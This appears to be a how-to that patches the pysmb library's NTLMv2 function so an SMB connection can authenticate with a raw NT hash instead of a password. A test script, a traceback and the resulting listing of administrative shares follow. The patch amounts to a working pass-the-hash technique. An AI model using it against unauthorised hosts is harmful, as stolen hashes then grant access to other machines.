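# Fetch the pysmb sources and install them from inside the checkout.
git clone https://github.com/miketeo/pysmb.git
# setup.py lives in the cloned directory, so change into it before installing.
cd pysmb
python setup.py install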
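Then drop this in test.py (the "!"-prefixed hash string is only understood once ntlm.py has been modified as shown further down):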
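import sys
import pprint
from smb.SMBConnection import SMBConnection
from util import getConnectionInfo

# Lists the share names of one SMB host, authenticating with an NT hash
# instead of a clear-text password.
#
# The leading "!" is not stock pysmb behaviour: it is only interpreted by the
# modified generateChallengeResponseV2() in smb/ntlm.py shown on this page.
# An NT hash is password-equivalent for NTLM authentication, so a real value
# placed here must be handled like the password itself (not committed, not
# left in shell history or logs).
conn = SMBConnection(
    "UserAccount",
    "!31:70:ae:1e:3e:NT:LM:Hash:Goes:Here:a9:37:fc:e3",
    "Your IP Here",
    "RemoteHostname",
    use_ntlm_v2=True,
    is_direct_tcp=True,
)

try:
    # is_direct_tcp=True pairs with port 445; with is_direct_tcp=False pysmb
    # uses the NetBIOS session service, which conventionally listens on 139.
    # connect() reports the authentication result as a boolean, so check it
    # instead of letting listShares() fail later with a less obvious error.
    if not conn.connect("RemoteHostName", 445):
        sys.exit("SMB authentication failed")

    for share in conn.listShares():
        print(share.name.lower())

    # Optional extras kept from the original script:
    # pretty print loaded modules
    # pprint.pprint(sys.modules)
    # filelist = conn.listPath('shared_folder_name', '/')
finally:
    # Always release the socket, including on authentication failure.
    conn.close()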
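Modify this code in Python\pysmb\python3\smb -> ntlm.py (the traceback below runs from the installed egg, so re-run python setup.py install after editing):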
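def generateChallengeResponseV2(password, user, server_challenge, server_info, domain = '', client_challenge = None):
    """Build the NTLMv2 challenge responses and the session key.

    ``password`` is either a clear-text password or, when it starts with
    "!", a hex-encoded NT hash (colons between bytes are ignored) that is
    used directly instead of being derived with MD4.

    NOTE(review): the "!" marker is in-band, so a genuine clear-text
    password that begins with "!" is now parsed as a hash and fails.

    :param password: clear-text password, or "!" followed by the NT hash in hex
    :param user: account name; upper-cased before it is mixed into the key
    :param server_challenge: challenge bytes received from the server
    :param server_info: bytes appended to the response blob as received
    :param domain: appended to the upper-cased user name when deriving the key
    :param client_challenge: optional 8-byte client nonce; generated if falsy
    :return: tuple ``(nt_challenge_response, lm_challenge_response, session_key)``
    :raises ValueError: if the supplied hash is not valid hex or not 16 bytes
    """
    # Function-scope import: the module's import block is not visible here.
    import secrets

    client_timestamp = b'\0' * 8

    if not client_challenge:
        # The client challenge is a nonce in the NTLMv2 response; draw it
        # from the OS CSPRNG rather than the predictable `random` module.
        client_challenge = secrets.token_bytes(8)
    assert len(client_challenge) == 8

    if password.startswith("!"):
        ntlm_hash = bytes.fromhex(password[1:].replace(":", ""))
        if len(ntlm_hash) != 16:
            # An MD4 digest is 16 bytes; any other length would silently
            # yield a response the server rejects. The value itself is
            # deliberately left out of the message.
            raise ValueError("NT hash after '!' must be 16 bytes (32 hex digits)")
    else:
        d = MD4()
        d.update(password.encode('UTF-16LE'))
        ntlm_hash = d.digest()   # The NT password hash

    # The NT hash is password-equivalent for NTLM, so it is intentionally not
    # printed or logged here (the page's version echoed it to stdout).

    # The NTLMv2 password hash. In [MS-NLMP], this is the result of NTOWFv2 and LMOWFv2 functions
    response_key = hmac.new(ntlm_hash, (user.upper() + domain).encode('UTF-16LE'), 'md5').digest()
    temp = b'\x01\x01' + b'\0'*6 + client_timestamp + client_challenge + b'\0'*4 + server_info
    ntproofstr = hmac.new(response_key, server_challenge + temp, 'md5').digest()

    nt_challenge_response = ntproofstr + temp
    lm_challenge_response = hmac.new(response_key, server_challenge + client_challenge, 'md5').digest() + client_challenge
    session_key = hmac.new(response_key, ntproofstr, 'md5').digest()

    # Troubleshooting aid from the page: shows which call path reached this
    # function. It prints on every authentication, so drop it once the
    # modification is confirmed to work.
    for line in traceback.format_stack():
        print(line.strip())

    return nt_challenge_response, lm_challenge_response, session_key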
Z:\Programming\Python\pysmb\python3\tests\SMBConnectionTests>test.py
File "Z:\Programming\Python\pysmb\python3\tests\SMBConnectionTests\test.py", line 7, in <module>
conn.connect("Hostname", 445)
File "C:\Users\User\AppData\Local\Programs\Python\Python38-32\lib\site-packages\pysmb-1.1.28-py3.8.egg\smb\SMBConnection.py", line 124, in connect
self._pollForNetBIOSPacket(timeout)
File "C:\Users\User\AppData\Local\Programs\Python\Python38-32\lib\site-packages\pysmb-1.1.28-py3.8.egg\smb\SMBConnection.py", line 634, in _pollForNetBIOSPacket
self.feedData(data)
File "C:\Users\User\AppData\Local\Programs\Python\Python38-32\lib\site-packages\pysmb-1.1.28-py3.8.egg\nmb\base.py", line 54, in feedData
self._processNMBSessionPacket(self.data_nmb)
File "C:\Users\User\AppData\Local\Programs\Python\Python38-32\lib\site-packages\pysmb-1.1.28-py3.8.egg\nmb\base.py", line 75, in _processNMBSessionPacket
self.onNMBSessionMessage(packet.flags, packet.data)
File "C:\Users\User\AppData\Local\Programs\Python\Python38-32\lib\site-packages\pysmb-1.1.28-py3.8.egg\smb\base.py", line 144, in onNMBSessionMessage
if self._updateState(self.smb_message):
File "C:\Users\User\AppData\Local\Programs\Python\Python38-32\lib\site-packages\pysmb-1.1.28-py3.8.egg\smb\base.py", line 285, in _updateState_SMB2
self._handleSessionChallenge(message, ntlm_token)
File "C:\Users\User\AppData\Local\Programs\Python\Python38-32\lib\site-packages\pysmb-1.1.28-py3.8.egg\smb\base.py", line 367, in _handleSessionChallenge_SMB2
nt_challenge_response, lm_challenge_response, session_key = ntlm.generateChallengeResponseV2(self.password,
File "C:\Users\User\AppData\Local\Programs\Python\Python38-32\lib\site-packages\pysmb-1.1.28-py3.8.egg\smb\ntlm.py", line 178, in generateChallengeResponseV2
for line in traceback.format_stack():
admin$
c$
d$
ipc$
print$
myShare